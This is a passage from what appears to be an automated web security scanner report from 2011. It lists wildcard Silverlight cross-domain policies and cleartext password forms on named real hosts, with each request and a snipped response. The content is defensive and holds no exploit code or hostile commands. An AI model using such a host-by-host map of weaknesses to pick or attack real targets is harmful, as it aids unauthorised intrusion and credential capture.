Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.6. http://cdn.eyewonder.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.eyewonder.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "a683d7574fd1ca1:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 01:58:53 GMT
Last-Modified: Thu, 01 Apr 2010 03:56:43 GMT
Expires: Thu, 05 May 2011 06:58:51 GMT
Content-Length: 268
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="http://*"/></allow-from><grant-to><resource path="/" include-subpath
...[SNIP]...

7.7. http://clk.atdmt.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: image/gif
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.8. http://expapi.oscar.aol.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://expapi.oscar.aol.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: expapi.oscar.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:58 GMT
Server: Apache
Last-Modified: Wed, 26 Aug 2009 19:46:35 GMT
ETag: "850019-15c-47210b5623cc0"
Accept-Ranges: bytes
Content-Length: 348
Keep-Alive: timeout=1, max=59
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
<domain uri="http://*"/>
</allow-from>

...[SNIP]...

7.9. http://metrics.apple.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.apple.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:43:29 GMT
Server: Omniture DC/2.0.0
xserver: www113
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.10. http://o.aolcdn.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://o.aolcdn.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "d8baf0f1b81f70a7f23356194f1356bd:1219856443"
Last-Modified: Wed, 27 Aug 2008 17:00:43 GMT
Content-Type: application/xml
Cache-Control: max-age=1209600
Expires: Thu, 19 May 2011 00:56:50 GMT
Date: Thu, 05 May 2011 00:56:50 GMT
Content-Length: 338
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.11. http://o.sa.aol.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://o.sa.aol.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:26 GMT
Server: Omniture DC/2.0.0
xserver: www92
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.12. http://s.stats.wordpress.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.stats.wordpress.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s.stats.wordpress.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Thu, 05 May 2011 00:59:32 GMT
ETag: "135-4d1c766b-100a6d00"
Last-Modified: Thu, 30 Dec 2010 12:09:15 GMT
Server: nginx
Content-Length: 309
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

7.13. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:41 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 12 May 2011 00:57:41 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.14. http://speed.pointroll.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://speed.pointroll.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 00:56:56 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

7.15. http://sportingnews.122.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: sportingnews.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:45 GMT
Server: Omniture DC/2.0.0
xserver: www24
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.16. http://stats.wordpress.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://stats.wordpress.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 01:00:01 GMT
Content-Type: text/xml
Connection: close
Accept-Ranges: bytes
ETag: "135-4c7e718e-f5f50"
Last-Modified: Wed, 01 Sep 2010 15:30:22 GMT
Content-Length: 309

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

7.17. http://www.aol.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aol.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.18. http://ts1.mm.bing.net/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ts1.mm.bing.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts1.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Thu, 05 May 2011 01:00:32 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>

<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

7.19. http://ts2.mm.bing.net/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ts2.mm.bing.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ts2.mm.bing.net

Response

HTTP/1.0 200 OK
Content-Length: 1766
Content-Type: text/xml
Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT
Date: Thu, 05 May 2011 01:00:33 GMT
Connection: close
Cache-Control: public, max-age=3600

<?xml version="1.0" encoding="utf-8"?>

<access-policy>
<cross-domain-access>
<policy>
</policy>
<policy>
<allow-from http-request-headers="*"
...[SNIP]...
<domain uri="http://*.msn.com" />
...[SNIP]...
<domain uri="http://*.microsoft.com" />
...[SNIP]...
<domain uri="http://*.bing4.com" />
...[SNIP]...
<domain uri="http://*.virtualearth.net" />
...[SNIP]...
<domain uri="http://*.virtualearth-int.net" />
...[SNIP]...

8. Cleartext submission of password previous next
There are 30 instances of this issue:

http://appworld.blackberry.com/webstore/content/13833
http://appworld.blackberry.com/webstore/content/13833
http://appworld.blackberry.com/webstore/content/13833
http://appworld.blackberry.com/webstore/content/19143
http://appworld.blackberry.com/webstore/content/19143
http://appworld.blackberry.com/webstore/content/19143
http://digg.com/submit
http://o.aolcdn.com/art/merge/
http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/
http://top-sec.net/vb/
http://top-sec.net/vb/calendar.php
http://top-sec.net/vb/faq.php
http://top-sec.net/vb/forumdisplay.php
http://top-sec.net/vb/index.php
http://top-sec.net/vb/login.php
http://top-sec.net/vb/member.php
http://top-sec.net/vb/memberlist.php
http://top-sec.net/vb/online.php
http://top-sec.net/vb/online.php
http://top-sec.net/vb/profile.php
http://top-sec.net/vb/profile.php
http://top-sec.net/vb/search.php
http://top-sec.net/vb/sendmessage.php
http://top-sec.net/vb/showgroups.php
http://top-sec.net/vb/showthread.php
http://top-sec.net/vb/tags.php
http://www.facebook.com/
http://www.facebook.com/r.php
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

8.1. http://appworld.blackberry.com/webstore/content/13833 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://appworld.blackberry.com
Path:	/webstore/content/13833

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://appworld.blackberry.com/webstore/content/home.seam

The form contains the following password field:

deviceModalsForm4:inputPassword2

Request

GET /webstore/content/13833 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86382
Date: Thu, 05 May 2011 10:52:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 200863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm4" name="deviceModalsForm4" method="post" action="/webstore/content/home.seam" class="awModalMessageForm" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm4" value="deviceModalsForm4" />
...[SNIP]...
<td><input id="deviceModalsForm4:inputPassword2" type="password" name="deviceModalsForm4:inputPassword2" value="" maxlength="32" onkeypress="userPin = $F('pin_list'); return enterKeyTrap(event, 'doDeviceChange(\'deviceChangeWindow\',\'' + userPin +'\',\'' + $F('deviceModalsForm4:inputPassword2') +'\')');" disabled="disabled" class="awChangeDevicePasswordField" /></td>
...[SNIP]...

8.2. http://appworld.blackberry.com/webstore/content/13833 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://appworld.blackberry.com
Path:	/webstore/content/13833

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://appworld.blackberry.com/webstore/content/home.seam

The form contains the following password field:

deviceModalsForm1:inputPassword

Request

GET /webstore/content/13833 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86382
Date: Thu, 05 May 2011 10:52:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 200863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm1" name="deviceModalsForm1" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm1" value="deviceModalsForm1" />
...[SNIP]...
<td><input id="deviceModalsForm1:inputPassword" type="password" name="deviceModalsForm1:inputPassword" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceAuthenticationWindow\',\'' + $F('deviceModalsForm1:inputPassword') + '\')');" /></td>
...[SNIP]...

8.3. http://appworld.blackberry.com/webstore/content/13833 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://appworld.blackberry.com
Path:	/webstore/content/13833

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://appworld.blackberry.com/webstore/content/home.seam

The form contains the following password field:

deviceModalsForm2:inputPassword3

Request

GET /webstore/content/13833 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86382
Date: Thu, 05 May 2011 10:52:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 200863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm2" name="deviceModalsForm2" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm2" value="deviceModalsForm2" />
...[SNIP]...
<td><input id="deviceModalsForm2:inputPassword3" type="password" name="deviceModalsForm2:inputPassword3" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceInvalidPasswordWindow\',\'' + $F('deviceModalsForm2:inputPassword3') + '\')');" /></td>
...[SNIP]...

8.4. http://appworld.blackberry.com/webstore/content/19143 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://appworld.blackberry.com
Path:	/webstore/content/19143

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://appworld.blackberry.com/webstore/content/home.seam

The form contains the following password field:

deviceModalsForm4:inputPassword2

Request

GET /webstore/content/19143 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=37653
Date: Thu, 05 May 2011 13:02:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm4" name="deviceModalsForm4" method="post" action="/webstore/content/home.seam" class="awModalMessageForm" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm4" value="deviceModalsForm4" />
...[SNIP]...
<td><input id="deviceModalsForm4:inputPassword2" type="password" name="deviceModalsForm4:inputPassword2" value="" maxlength="32" onkeypress="userPin = $F('pin_list'); return enterKeyTrap(event, 'doDeviceChange(\'deviceChangeWindow\',\'' + userPin +'\',\'' + $F('deviceModalsForm4:inputPassword2') +'\')');" disabled="disabled" class="awChangeDevicePasswordField" /></td>
...[SNIP]...

8.5. http://appworld.blackberry.com/webstore/content/19143 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://appworld.blackberry.com
Path:	/webstore/content/19143

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://appworld.blackberry.com/webstore/content/home.seam

The form contains the following password field:

deviceModalsForm1:inputPassword

Request

GET /webstore/content/19143 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=37653
Date: Thu, 05 May 2011 13:02:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm1" name="deviceModalsForm1" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm1" value="deviceModalsForm1" />
...[SNIP]...
<td><input id="deviceModalsForm1:inputPassword" type="password" name="deviceModalsForm1:inputPassword" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceAuthenticationWindow\',\'' + $F('deviceModalsForm1:inputPassword') + '\')');" /></td>
...[SNIP]...

8.6. http://appworld.blackberry.com/webstore/content/19143 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://appworld.blackberry.com
Path:	/webstore/content/19143

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://appworld.blackberry.com/webstore/content/home.seam

The form contains the following password field:

deviceModalsForm2:inputPassword3

Request

GET /webstore/content/19143 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=37653
Date: Thu, 05 May 2011 13:02:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm2" name="deviceModalsForm2" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm2" value="deviceModalsForm2" />
...[SNIP]...
<td><input id="deviceModalsForm2:inputPassword3" type="password" name="deviceModalsForm2:inputPassword3" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceInvalidPasswordWindow\',\'' + $F('deviceModalsForm2:inputPassword3') + '\')');" /></td>
...[SNIP]...

8.7. http://digg.com/submit previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/submit

The form contains the following password field:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Fri, 06-May-2011 10:52:57 GMT; path=/; domain=digg.com
Set-Cookie: d=74a0d936cee33a389ca1110cdc45b54249fb1ab6f82ad32b7390fde3b4b270f3; expires=Tue, 04-May-2021 21:00:37 GMT; path=/; domain=.digg.com
X-Digg-Time: D=25192 10.2.128.235
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8171

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.8. http://o.aolcdn.com/art/merge/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://o.aolcdn.com
Path:	/art/merge/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://o.aolcdn.com/art/merge/?f=/mobileportal/s2c_modal.js&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y

The form contains the following password field:

confirmpassword

Request

GET /art/merge/?f=/mobileportal/s2c_modal.js&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 00:58:27 GMT
Date: Thu, 05 May 2011 00:58:27 GMT
Connection: close
Content-Length: 27714

eval(function ($) {
$.modal = function (data, options) {
return $.modal.impl.init(data, options);
};
$.modal.close = function () {
$.modal.impl.close(true);
};
$.fn
...[SNIP]...
</span><form name="login" onsubmit="profileLogin(); return false;"><label for="confirmpassword">
...[SNIP]...
</label><input type="password" name="confirmpassword" id="pwLogin" /><input id="loginButton" type="submit" onClick="profileLogin();" value="Login">
...[SNIP]...

8.9. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://portalblog.aol.com
Path:	/2011/02/01/aol-across-the-web-and-beyond/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

The form contains the following password field:

AuthorPassword

Request

GET /2011/02/01/aol-across-the-web-and-beyond/ HTTP/1.1
Host: portalblog.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:47 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 11:53:47 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:53:46 GMT; path=/
Keep-Alive: timeout=5, max=999990
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 62860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</div>
<form action="#comment" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
</label>
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/>
   </div>
...[SNIP]...

8.10. http://top-sec.net/vb/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/ HTTP/1.1
Host: top-sec.net
Proxy-Connection: keep-alive
Referer: http://top-sec.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:05:33 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561133; expires=Fri, 04-May-2012 02:05:33 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 02:05:33 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Content-Type: text/html; charset=windows-1256
Content-Length: 121955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
   <!-
...[SNIP]...

       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.11. http://top-sec.net/vb/calendar.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/calendar.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

